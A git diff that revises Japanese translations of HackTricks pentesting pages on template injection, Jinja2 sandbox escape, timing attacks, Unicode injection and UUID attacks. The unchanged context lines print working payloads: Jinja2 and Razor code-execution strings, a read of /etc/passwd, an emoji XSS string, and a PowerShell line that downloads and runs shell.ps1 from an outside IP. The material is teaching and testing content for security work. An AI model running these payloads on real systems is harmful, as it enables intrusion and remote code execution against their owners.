 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty)
 
 ### Twig (PHP)
@@ -494,7 +494,7 @@ $templates = new League\Plates\Engine('/path/to/templates');
 // Render a template
 echo $templates->render('profile', ['name' => 'Jonathan']);
 ```
-ページテンプレート：
+ページテンプレート:
 ```php
 <?php $this->layout('template', ['title' => 'User Profile']) ?>
 
@@ -674,7 +674,7 @@ URLencoded:
 |                  | 出力を評価してレンダリングする       |
 |                  | HTMLエンコードされた出力を評価してレンダリングする |
 |                  | コメント                             |
-| and              | コードを許可する（デフォルトでは無効） |
+| そして            | コードを許可する（デフォルトで無効） |
 
 - \= 49
 
@@ -859,7 +859,7 @@ range.constructor(
 
 
 ```
-[**RCEは**](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/) `__builtins__`に依存しません:
+[**RCEは**](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/) `__builtins__`に依存しません：
 ```python
 {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
 {{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
@@ -876,7 +876,7 @@ range.constructor(
 jinja2-ssti.md
 {{#endref}}
 
-他のペイロードは[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
+他のペイロードは[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)にあります。
 
 ### Mako (Python)
 ```python
@@ -900,12 +900,12 @@ ${x}
 
 ### Razor (.Net)
 
-- `@(2+2) <= 成功`
-- `@() <= 成功`
-- `@("{{code}}") <= 成功`
-- `@ <= 成功`
-- `@{} <= エラー！`
-- `@{ <= エラー！`
+- `@(2+2) <= Success`
+- `@() <= Success`
+- `@("{{code}}") <= Success`
+- `@ <=Success`
+- `@{} <= ERROR!`
+- `@{ <= ERRROR!`
 - `@(1+2)`
 - `@( //C#Code )`
 - `@System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");`
@@ -922,7 +922,7 @@ ${x}
 
 - `<%= 7*7 %>` = 49
 - `<%= "foo" %>` = foo
-- `<%= foo %>` = 何も表示されません
+- `<%= foo %>` = Nothing
 - `<%= response.write(date()) %>` = \<Date>
 ```xml
 <%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
@@ -961,7 +961,7 @@ vbnet Copy code
 
 RCEの悪用は、`html/template`と`text/template`の間で大きく異なります。`text/template`モジュールは、任意の公開関数を直接呼び出すことを許可します（“call”値を使用）。これは`html/template`では許可されていません。これらのモジュールのドキュメントは [here for html/template](https://golang.org/pkg/html/template/) と [here for text/template](https://golang.org/pkg/text/template/) で入手できます。
 
-GoにおけるSSTIを介したRCEでは、オブジェクトメソッドを呼び出すことができます。たとえば、提供されたオブジェクトにコマンドを実行する`System`メソッドがある場合、`{{ .System "ls" }}`のように悪用できます。これを悪用するには、通常ソースコードへのアクセスが必要です。
+GoにおけるSSTIを介したRCEでは、オブジェクトメソッドを呼び出すことができます。たとえば、提供されたオブジェクトにコマンドを実行する`System`メソッドがある場合、`{{ .System "ls" }}`のように悪用できます。これを悪用するには、通常、ソースコードにアクセスする必要があります。
 ```go
 func (p Person) Secret (test string) string {
 out, _ := exec.Command(test).CombinedOutput()
@@ -975,7 +975,7 @@ return string(out)
 
 ### さらなるエクスプロイト
 
-さらなるエクスプロイトについては、[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection)を確認してください。また、[https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)で興味深いタグ情報を見つけることができます。
+さらなるエクスプロイトについては [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) を確認してください。また、興味深いタグ情報は [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI) で見つけることができます。
 
 ## BlackHat PDF
 
@@ -999,7 +999,7 @@ return string(out)
 
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
 
-## 実践と参考文献
+## 実践 & 参考文献
 
 - [https://portswigger.net/web-security/server-side-template-injection/exploiting](https://portswigger.net/web-security/server-side-template-injection/exploiting)
 - [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
diff --git a/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md b/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
index 749dbfd3b..e1c1fef3e 100644
--- a/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
+++ b/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
@@ -18,11 +18,11 @@ Expression Language (EL) は、JavaEE においてプレゼンテーション層
 EL は JavaEE テクノロジー、スタンドアロン環境に存在し、`.jsp` または `.jsf` ファイル拡張子、スタックエラー、およびヘッダー内の「Servlet」などの用語を通じて認識されます。ただし、その機能や特定の文字の使用はバージョンに依存する場合があります。
 
 > [!NOTE]
-> **EL バージョン**によっては、いくつかの **機能**が **オン**または **オフ**である可能性があり、通常、いくつかの **文字**が **禁止**されることがあります。
+> **EL バージョン**によっては、いくつかの **機能**が **On** または **Off** であり、通常いくつかの **文字**が **不許可** である場合があります。
 
 ## Basic Example
 
-(EL に関する別の興味深いチュートリアルは [https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=sponsblog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=sponsblog/exploiting-ognl-injection-in-apache-struts/) で見つけることができます。)
+(EL に関する別の興味深いチュートリアルは [https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=sponsblog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=sponsblog/exploiting-ognl-injection-in-apache-struts/) で見つけることができます)
 
 [**Maven**](https://mvnrepository.com) リポジトリから以下の jar ファイルをダウンロードします：
 
@@ -206,7 +206,7 @@ ${employee.FirstName}
 ```
 ## WAF バイパス
 
-チェック [https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
+Check [https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
 
 ## 参考文献
 
diff --git a/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md b/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
index cec03cc0a..83a248c41 100644
--- a/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
+++ b/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
@@ -60,12 +60,12 @@ Debug Extensionが有効になっている場合、現在のコンテキスト
 ```
 ## **Jinja Injection**
 
-まず最初に、Jinjaインジェクションでは、**サンドボックスから脱出する方法を見つける**必要があり、通常のPython実行フローへのアクセスを回復する必要があります。そのためには、**サンドボックスからアクセス可能な非サンドボックス環境の**オブジェクトを**悪用する**必要があります。
+まず第一に、Jinjaインジェクションでは、**サンドボックスから脱出する方法を見つける**必要があります。そして、通常のPython実行フローへのアクセスを回復します。そのためには、**サンドボックスからアクセス可能な非サンドボックス環境の**オブジェクトを**悪用する**必要があります。
 
 ### グローバルオブジェクトへのアクセス
 
 例えば、コード`render_template("hello.html", username=username, email=email)`では、オブジェクトusernameとemailは**非サンドボックスのPython環境から来ており**、**サンドボックス環境内でアクセス可能**です。\
-さらに、**サンドボックス環境から常にアクセス可能な**他のオブジェクトもあります。これらは：
+さらに、**サンドボックス環境から常にアクセス可能な**他のオブジェクトもあります。これらは:
 ```
 []
 ''
@@ -74,11 +74,11 @@ dict
 config
 request
 ```
-### \<class 'object'> の回復
+### Recovering \<class 'object'>
 
-次に、これらのオブジェクトから **`<class 'object'>`** に到達する必要があります。これは、定義された **クラス** を **回復** しようとするためです。なぜなら、このオブジェクトから **`__subclasses__`** メソッドを呼び出し、**サンドボックス化されていない** python 環境のすべてのクラスに **アクセス** できるからです。
+次に、これらのオブジェクトからクラス **`<class 'object'>`** にアクセスする必要があります。これは、定義された **classes** を **recover** しようとするためです。なぜなら、このオブジェクトから **`__subclasses__`** メソッドを呼び出し、**non-sandboxed** python 環境のすべてのクラスにアクセスできるからです。
 
-その **オブジェクトクラス** にアクセスするには、**クラスオブジェクト** にアクセスし、次に **`__base__`**、**`__mro__()[-1]`** または `.`**`mro()[-1]`** にアクセスする必要があります。そして、**このオブジェクトクラス** に到達した後、**`__subclasses__()`** を **呼び出します**。
+その **object class** にアクセスするには、**class object** にアクセスし、次に **`__base__`**、**`__mro__()[-1]`** または `.`**`mro()[-1]`** にアクセスする必要があります。そして、**object class** に到達した後、**`__subclasses__()`** を **call** します。
 
 これらの例を確認してください:
 ```python
@@ -126,9 +126,9 @@ dict.__mro__[-1]
 ```
 ### RCE エスケープ
 
-**回復した** `<class 'object'>` と `__subclasses__` を呼び出したことで、これらのクラスを使用してファイルを読み書きしたり、コードを実行したりすることができます。
+**回復した** `<class 'object'>` と `__subclasses__` を呼び出したことで、これらのクラスを使用してファイルを読み書きしたり、コードを実行したりできるようになりました。
 
-`__subclasses__` の呼び出しにより、**数百の新しい関数にアクセスする機会**が得られました。私たちは、**ファイルクラス**にアクセスして**ファイルを読み書きする**ことや、**コマンドを実行することを許可するクラス**（例えば `os`）にアクセスすることで満足します。
+`__subclasses__` の呼び出しにより、**数百の新しい関数にアクセスする機会**が得られました。私たちは、**ファイルクラス**にアクセスして**ファイルを読み書きする**ことや、**コマンドを実行することを許可する**クラス（例えば `os`）にアクセスすることで満足します。
 
 **リモートファイルの読み書き**
 ```python
@@ -169,7 +169,7 @@ dict.__mro__[-1]
 
 #### 一般的なバイパス
 
-これらのバイパスは、**いくつかの文字を使用せずに**オブジェクトの**属性**に**アクセス**することを可能にします。\
+これらのバイパスは、**いくつかの文字**を使用せずにオブジェクトの**属性**に**アクセス**することを可能にします。\
 前の例でこれらのバイパスのいくつかをすでに見ましたが、ここで要約します：
 ```bash
 # Without quotes, _, [, ]
@@ -250,7 +250,7 @@ http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|joi
 [**グローバルオブジェクト**](jinja2-ssti.md#accessing-global-objects)から、**そのクラスを使用せずにRCEに到達する**別の方法があります。\
 これらのグローバルオブジェクトから**関数**にアクセスできれば、**`__globals__.__builtins__`**にアクセスでき、そこから**RCE**は非常に**簡単**です。
 
-**`request`**、**`config`**、およびアクセス可能な**他の**興味深い**グローバルオブジェクト**から**関数**を見つけることができます。
+**`request`**、**`config`**、およびアクセス可能な**他の**興味深い**グローバルオブジェクト**から**関数**を**見つける**ことができます。
 ```bash
 {{ request.__class__.__dict__ }}
 - application
@@ -270,7 +270,7 @@ http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|joi
 
 # You can iterate through children objects to find more
 ```
-いくつかの関数を見つけたら、次のコマンドでビルトインを復元できます:
+いくつかの関数を見つけたら、次のようにしてビルトインを復元できます:
 ```python
 # Read file
 {{ request.__class__._load_form_data.__globals__.__builtins__.open("/etc/passwd").read() }}
@@ -322,7 +322,7 @@ The request will be urlencoded by default according to the HTTP format, which ca
 ## 参考文献
 
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
-- [attrトリックを使用してブラックリストに載っている文字をバイパスする方法はこちらを確認してください](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/#python3).
+- [attrトリックを使用してブラックリストに登録された文字をバイパスする方法はこちらを確認してください](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/#python3)。
 - [https://twitter.com/SecGus/status/1198976764351066113](https://twitter.com/SecGus/status/1198976764351066113)
 - [https://hackmd.io/@Chivato/HyWsJ31dI](https://hackmd.io/@Chivato/HyWsJ31dI)
 
diff --git a/src/pentesting-web/timing-attacks.md b/src/pentesting-web/timing-attacks.md
index 2d5bf78cf..2f9321dd1 100644
--- a/src/pentesting-web/timing-attacks.md
+++ b/src/pentesting-web/timing-attacks.md
@@ -3,7 +3,7 @@
 {{#include ../banners/hacktricks-training.md}}
 
 > [!WARNING]
-> この技術を深く理解するためには、[https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-that-actually-work](https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-that-actually-work)の元のレポートを確認してください。
+> この技術を深く理解するためには、[https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-that-actually-work](https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-that-actually-work)からのオリジナルレポートを確認してください。
 
 ## 基本情報
 
@@ -18,18 +18,18 @@
 
 ブログ記事では、この技術を使用して隠れたパラメータやヘッダーを見つけることができた方法がコメントされています。リクエストにパラメータやヘッダーが存在する場合、**約5msの時間差があった**ことを確認するだけです。実際、この発見技術はBurp Suiteの**Param Miner**に追加されました。
 
-これらの時間差は、**DNSリクエスト**が実行されたため、無効な入力のために**ログが書き込まれた**ため、またはリクエストにパラメータが存在する場合に**チェックが実行された**ために発生する可能性があります。
+これらの時間差は、**DNSリクエスト**が実行されたため、無効な入力によって**ログが書き込まれた**ため、またはリクエストにパラメータが存在する場合に**チェックが実行された**ために発生する可能性があります。
 
 この種の攻撃を実行する際に覚えておくべきことは、隠れた性質のために、時間差の実際の原因が何であるかを知らない可能性があるということです。
 
 ### リバースプロキシの誤設定
 
-同じ研究では、タイミング技術が「スコープ付きSSRF」（許可されたIP/ドメインにのみアクセスできるSSRF）を発見するのに優れていることが共有されました。**許可されたドメインが設定されているときと、許可されていないドメインが設定されているときの時間差を確認する**ことで、応答が同じであってもオープンプロキシを発見するのに役立ちます。
+同じ研究では、タイミング技術が「スコープ付きSSRF」（許可されたIP/ドメインにのみアクセスできるSSRF）を発見するのに優れていることが共有されました。**許可されたドメインが設定されている場合と、許可されていないドメインが設定されている場合の時間差を確認する**ことで、応答が同じであってもオープンプロキシを発見するのに役立ちます。
 
 スコープ付きオープンプロキシが発見されると、ターゲットの既知のサブドメインを解析することで有効なターゲットを見つけることができ、これにより以下が可能になります：
 
-- **ファイアウォールをバイパス**し、**オープンプロキシ**を介して制限されたサブドメインにアクセスすること。
-- さらに、**オープンプロキシ**を悪用することで、**内部でのみアクセス可能な新しいサブドメインを発見すること**も可能です。
+- **ファイアウォールをバイパス**し、**オープンプロキシ**を介して制限されたサブドメインにアクセスする
+- さらに、**オープンプロキシ**を悪用することで、**内部でのみアクセス可能な新しいサブドメインを発見する**ことも可能です。
 - **フロントエンドのなりすまし攻撃**：フロントエンドサーバーは通常、`X-Forwarded-For`や`X-Real-IP`のようなバックエンド用のヘッダーを追加します。これらのヘッダーを受け取るオープンプロキシは、要求されたエンドポイントにそれらを追加するため、攻撃者はホワイトリストに登録された値を追加することで、さらに多くの内部ドメインにアクセスできる可能性があります。
 
 ## 参考文献
diff --git a/src/pentesting-web/unicode-injection/README.md b/src/pentesting-web/unicode-injection/README.md
index d741182ec..77e0013a8 100644
--- a/src/pentesting-web/unicode-injection/README.md
+++ b/src/pentesting-web/unicode-injection/README.md
@@ -10,8 +10,8 @@
 
 ユニコード正規化は、**ユニコード文字がASCII文字に正規化される**ときに発生します。
 
-このタイプの脆弱性の一般的なシナリオは、システムが**チェックした後に**ユーザーの**入力を何らかの形で変更する**ときに発生します。たとえば、いくつかの言語では、**入力を大文字または小文字にする**ための単純な呼び出しが、与えられた入力を正規化し、**ユニコードがASCIIに変換され**て新しい文字が生成される可能性があります。\
-詳細については、次を確認してください：
+この種の脆弱性の一般的なシナリオは、システムが**チェックした後に**ユーザーの**入力を何らかの形で変更する**ときに発生します。たとえば、いくつかの言語では、**入力を大文字または小文字にする**ための単純な呼び出しが、与えられた入力を正規化し、**ユニコードがASCIIに変換され**て新しい文字が生成される可能性があります。\
+詳細については、次を確認してください:
 
 {{#ref}}
 unicode-normalization.md
@@ -21,7 +21,7 @@ unicode-normalization.md
 
 ユニコード文字は通常、**`\u`プレフィックス**で表されます。たとえば、文字`㱋`は`\u3c4b`です（[ここで確認](https://unicode-explorer.com/c/3c4B)）。バックエンドが**`\u`プレフィックスを`%`に変換**すると、結果の文字列は`%3c4b`になり、URLデコードすると**`<4b`**になります。そして、見ての通り、**`<`文字が注入されます**。\
 バックエンドが脆弱であれば、この技術を使用して**任意の種類の文字を注入**することができます。\
-必要な文字を見つけるには、[https://unicode-explorer.com/](https://unicode-explorer.com/)を確認してください。
+必要な文字を見つけるには[https://unicode-explorer.com/](https://unicode-explorer.com/)を確認してください。
 
 この脆弱性は、研究者が発見した脆弱性から来ており、詳細な説明については[https://www.youtube.com/watch?v=aUsAHb0E7Cg](https://www.youtube.com/watch?v=aUsAHb0E7Cg)を確認してください。
 
@@ -29,9 +29,9 @@ unicode-normalization.md
 
 バックエンドは、**絵文字を受け取るとき**に何かおかしな動作をします。これは、研究者が`💋img src=x onerror=alert(document.domain)//💛`のようなペイロードでXSSを達成した[**このレポート**](https://medium.com/@fpatrik/how-i-found-an-xss-vulnerability-via-using-emojis-7ad72de49209)で起こったことです。
 
-この場合、サーバーは悪意のある文字を削除した後、**Windows-1252からUTF-8にUTF-8文字列を変換**したためにエラーが発生しました（基本的に入力エンコーディングと変換元エンコーディングが不一致でした）。そのため、適切な<を提供せず、奇妙なユニコードのもの`‹`を提供しました。\
-``そのため、彼らはこの出力を取り、**今度はUTF-8からASCIIに再変換しました**。これにより、`‹`が`<`に**正規化**され、これがそのシステムでのエクスプロイトが機能する方法でした。\
-これが起こったことです：
+この場合、サーバーは悪意のある文字を削除した後、**UTF-8文字列をWindows-1252からUTF-8に変換**したためにエラーが発生しました（基本的に入力エンコーディングと変換元エンコーディングが不一致でした）。そのため、適切な<を提供せず、奇妙なユニコードのものが得られました: `‹`\
+``そのため、彼らはこの出力を取り、**再度UTF-8からASCIIに変換しました**。これにより、`‹`が`<`に**正規化**され、これがそのシステムでのエクスプロイトが機能する方法でした。\
+これが起こったことです:
 ```php
 <?php
 
diff --git a/src/pentesting-web/unicode-injection/unicode-normalization.md b/src/pentesting-web/unicode-injection/unicode-normalization.md
index 0dc33eaa1..c04fcc5b8 100644
--- a/src/pentesting-web/unicode-injection/unicode-normalization.md
+++ b/src/pentesting-web/unicode-injection/unicode-normalization.md
@@ -2,26 +2,26 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**これは次の要約です:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/)。詳細については確認してください（画像はそこから取得されています）。
+**これは要約です:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/)。詳細については確認してください（画像はそこから取得されています）。
 
-## Understanding Unicode and Normalization
+## Unicodeと正規化の理解
 
-Unicode正規化は、文字の異なるバイナリ表現が同じバイナリ値に標準化されるプロセスです。このプロセスは、プログラミングやデータ処理における文字列の取り扱いにおいて重要です。Unicode標準は、2種類の文字の同等性を定義しています：
+Unicode正規化は、文字の異なるバイナリ表現が同じバイナリ値に標準化されるプロセスです。このプロセスは、プログラミングやデータ処理における文字列の取り扱いにおいて重要です。Unicode標準は、2種類の文字の同等性を定義しています。
 
-1. **Canonical Equivalence**: 文字が印刷または表示されたときに同じ外観と意味を持つ場合、それらは正準的に同等と見なされます。
-2. **Compatibility Equivalence**: 文字が同じ抽象的な文字を表す可能性があるが、異なる方法で表示される場合の弱い同等性の形式です。
+1. **標準同等性**: 文字が印刷または表示されたときに同じ外観と意味を持つ場合、それらは標準的に同等と見なされます。
+2. **互換性同等性**: 文字が同じ抽象的な文字を表す可能性があるが、異なる方法で表示される場合の弱い同等性の形式です。
 
-**Unicode正規化アルゴリズムは4つ**あります：NFC、NFD、NFKC、NFKD。それぞれのアルゴリズムは、正準的および互換性のある正規化技術を異なる方法で使用します。より深く理解するためには、[Unicode.org](https://unicode.org/)でこれらの技術を探ることができます。
+**4つのUnicode正規化アルゴリズム**があります：NFC、NFD、NFKC、NFKD。それぞれのアルゴリズムは、標準的および互換性のある正規化技術を異なる方法で使用します。より深く理解するためには、[Unicode.org](https://unicode.org/)でこれらの技術を探ることができます。
 
-### Key Points on Unicode Encoding
+### Unicodeエンコーディングに関する重要なポイント
 
-Unicodeエンコーディングを理解することは、特に異なるシステムや言語間の相互運用性の問題に対処する際に重要です。主なポイントは次のとおりです：
+Unicodeエンコーディングを理解することは、異なるシステムや言語間の相互運用性の問題に対処する際に重要です。主なポイントは以下の通りです。
 
-- **Code Points and Characters**: Unicodeでは、各文字または記号に「コードポイント」として知られる数値が割り当てられています。
-- **Bytes Representation**: コードポイント（または文字）は、メモリ内で1つ以上のバイトで表されます。たとえば、LATIN-1文字（英語圏で一般的）は1バイトを使用して表されます。ただし、より多くの文字セットを持つ言語は、表現のためにより多くのバイトが必要です。
-- **Encoding**: この用語は、文字がバイトの系列に変換される方法を指します。UTF-8は一般的なエンコーディング標準で、ASCII文字は1バイトで表され、他の文字には最大4バイトが使用されます。
-- **Processing Data**: データを処理するシステムは、バイトストリームを正しく文字に変換するために使用されるエンコーディングを認識している必要があります。
-- **Variants of UTF**: UTF-8の他にも、UTF-16（最小2バイト、最大4バイトを使用）やUTF-32（すべての文字に4バイトを使用）などの他のエンコーディング標準があります。
+- **コードポイントと文字**: Unicodeでは、各文字または記号に「コードポイント」として知られる数値が割り当てられています。
+- **バイト表現**: コードポイント（または文字）は、メモリ内で1つ以上のバイトで表現されます。たとえば、LATIN-1文字（英語圏で一般的）は1バイトを使用して表現されます。しかし、より多くの文字セットを持つ言語は、表現のためにより多くのバイトを必要とします。
+- **エンコーディング**: この用語は、文字がバイトの系列に変換される方法を指します。UTF-8は一般的なエンコーディング標準で、ASCII文字は1バイトで表現され、他の文字には最大4バイトが使用されます。
+- **データ処理**: データを処理するシステムは、バイトストリームを正しく文字に変換するために使用されるエンコーディングを認識している必要があります。
+- **UTFのバリアント**: UTF-8の他にも、最小2バイト（最大4バイト）を使用するUTF-16や、すべての文字に4バイトを使用するUTF-32などの他のエンコーディング標準があります。
 
 これらの概念を理解することは、Unicodeの複雑さとそのさまざまなエンコーディング方法から生じる潜在的な問題を効果的に処理し、軽減するために重要です。
 
@@ -79,11 +79,11 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
 
 ### XSS (クロスサイトスクリプティング)
 
-次のいずれかの文字を使用して、ウェブアプリを欺き、XSSを悪用することができます：
+次の文字のいずれかを使用して、ウェブアプリを欺き、XSSを悪用することができます：
 
 ![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../images/image (312) (2).png>)
 
-例えば、最初のUnicode文字は、`%e2%89%ae`または`%u226e`として送信できます。
+例えば、提案された最初のUnicode文字は、`%e2%89%ae`または`%u226e`として送信できます。
 
 ![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../images/image (215) (1) (1).png>)
 
diff --git a/src/pentesting-web/uuid-insecurities.md b/src/pentesting-web/uuid-insecurities.md
index b5dada29e..176c632a7 100644
--- a/src/pentesting-web/uuid-insecurities.md
+++ b/src/pentesting-web/uuid-insecurities.md
@@ -6,10 +6,10 @@
 
 Universally Unique Identifiers (UUIDs) は **情報を一意に識別するために使用される128ビットの番号** です。UUIDは、中央の調整なしに一意の識別子が必要なアプリケーションで不可欠です。一般的にデータベースキーとして使用され、文書やセッションなどのさまざまな要素を参照できます。
 
-UUIDは一意であり、**推測が難しい**ように設計されています。特定の形式で構成されており、32の16進数の数字で表される5つのグループに分かれています。UUIDには異なるバージョンがあり、それぞれ異なる目的に使用されます：
+UUIDは一意であり、**推測が難しい**ように設計されています。特定の形式で構造化されており、32の16進数の数字で表される5つのグループに分かれています。UUIDには異なるバージョンがあり、それぞれ異なる目的に使用されます：
 
 - **UUID v1** は時間ベースで、タイムスタンプ、クロックシーケンス、ノードID（MACアドレス）を組み込んでいますが、システム情報を露出する可能性があります。
-- **UUID v2** はv1に似ていますが、ローカルドメイン用の修正が含まれています（あまり広く使用されていません）。
+- **UUID v2** はv1に似ていますが、ローカルドメイン用の修正が含まれています（広く使用されていません）。
 - **UUID v3およびv5** は、名前空間と名前からハッシュ値を使用してUUIDを生成し、v3はMD5を使用し、v5はSHA-1を使用します。
 - **UUID v4** はほぼ完全にランダムに生成され、高い匿名性を提供しますが、重複のわずかなリスクがあります。
 
@@ -23,11 +23,11 @@ UUIDは一意であり、**推測が難しい**ように設計されています
 
 ## サンドイッチ攻撃
 
-「サンドイッチ攻撃」は、**WebアプリケーションにおけるUUID v1生成の予測可能性を悪用する特定のタイプの攻撃**です。特にパスワードリセットのような機能で使用されます。UUID v1は時間、クロックシーケンス、ノードのMACアドレスに基づいて生成されるため、攻撃者がこれらのUUIDのいくつかを取得できれば、ある程度予測可能になります。
+「サンドイッチ攻撃」は、**ウェブアプリケーションにおけるUUID v1生成の予測可能性を悪用する特定のタイプの攻撃**です。特にパスワードリセットのような機能で見られます。UUID v1は時間、クロックシーケンス、ノードのMACアドレスに基づいて生成されるため、攻撃者がこれらのUUIDのいくつかを取得できれば、ある程度予測可能になります。
 
 ### 例
 
-UUID v1を使用してパスワードリセットリンクを生成するWebアプリケーションを想像してみてください。攻撃者がこれを悪用して不正アクセスを得る方法は次のとおりです：
+UUID v1を使用してパスワードリセットリンクを生成するウェブアプリケーションを想像してみてください。攻撃者がこれを悪用して不正アクセスを得る方法は次のとおりです：
 
 1. **初期設定**：
 
@@ -38,7 +38,7 @@ UUID v1を使用してパスワードリセットリンクを生成するWebア
 
 - 攻撃者は最初のアカウント（\`attacker1@acme.com\`）のパスワードリセットをトリガーし、UUIDを含むパスワードリセットリンクを受け取ります。例えば \`99874128-7592-11e9-8201-bb2f15014a14\`。
 - その直後、攻撃者は被害者のアカウント（\`victim@acme.com\`）のパスワードリセットをトリガーし、次にすぐに2番目の攻撃者制御アカウント（\`attacker2@acme.com\`）のためにトリガーします。
-- 攻撃者は2番目のアカウントのためのリセットリンクを受け取り、UUIDは \`998796b4-7592-11e9-8201-bb2f15014a14\` です。
+- 攻撃者は2番目のアカウントのリセットリンクを受け取り、UUIDは \`998796b4-7592-11e9-8201-bb2f15014a14\` です。
 
 3. **分析**：
 
@@ -47,7 +47,7 @@ UUID v1を使用してパスワードリセットリンクを生成するWebア
 4. **ブルートフォース攻撃**：
 
 - 攻撃者は、これら2つの値の間のUUIDを生成するツールを使用し、生成された各UUIDをテストしてパスワードリセットリンクにアクセスしようとします（例：\`https://www.acme.com/reset/\<generated-UUID>\`）。
-- Webアプリケーションがそのような試行を適切にレート制限またはブロックしない場合、攻撃者は範囲内のすべての可能なUUIDを迅速にテストできます。
+- ウェブアプリケーションがそのような試行を適切にレート制限またはブロックしない場合、攻撃者は範囲内のすべての可能なUUIDを迅速にテストできます。
 
 5. **アクセス獲得**：
 
@@ -55,8 +55,8 @@ UUID v1を使用してパスワードリセットリンクを生成するWebア
 
 ### ツール
 
-- ツールを使用してサンドイッチ攻撃を自動的に実行できます：[**https://github.com/Lupin-Holmes/sandwich**](https://github.com/Lupin-Holmes/sandwich)
-- Burp Suiteで拡張機能[**UUID Detector**](https://portswigger.net/bappstore/65f32f209a72480ea5f1a0dac4f38248)を使用してこれらのタイプのUUIDを検出できます。
+- サンドイッチ攻撃を自動的に実行するには、ツールを使用できます：[**https://github.com/Lupin-Holmes/sandwich**](https://github.com/Lupin-Holmes/sandwich)
+- Burp SuiteでこれらのタイプのUUIDを検出するには、拡張機能[**UUID Detector**](https://portswigger.net/bappstore/65f32f209a72480ea5f1a0dac4f38248)を使用できます。
 
 ## 参考文献
 
diff --git a/src/pentesting-web/web-tool-wfuzz.md b/src/pentesting-web/web-tool-wfuzz.md
index 086c88233..ced605a0c 100644
--- a/src/pentesting-web/web-tool-wfuzz.md
+++ b/src/pentesting-web/web-tool-wfuzz.md
@@ -4,9 +4,9 @@
 
 ウェブアプリケーションをどこでもFUZZするためのツールです。
 
-> [Wfuzz](https://github.com/xmendez/wfuzz) はウェブアプリケーションの評価作業を容易にするために作成されており、単純な概念に基づいています：FUZZキーワードへの参照を指定されたペイロードの値で置き換えます。
+> [Wfuzz](https://github.com/xmendez/wfuzz) はウェブアプリケーションの評価作業を容易にするために作成され、単純な概念に基づいています：FUZZキーワードへの参照を指定されたペイロードの値で置き換えます。
 
-## インストール
+## Installation
 
 Kaliにインストール済み
 
@@ -48,7 +48,7 @@ wfuzz -e encoders #Prints the available encoders
 
 ### ログインフォームブルートフォース
 
-#### **POST、単一リスト、フィルタ文字列（非表示）**
+#### **POST、シングルリスト、フィルタ文字列（非表示）**
 ```bash
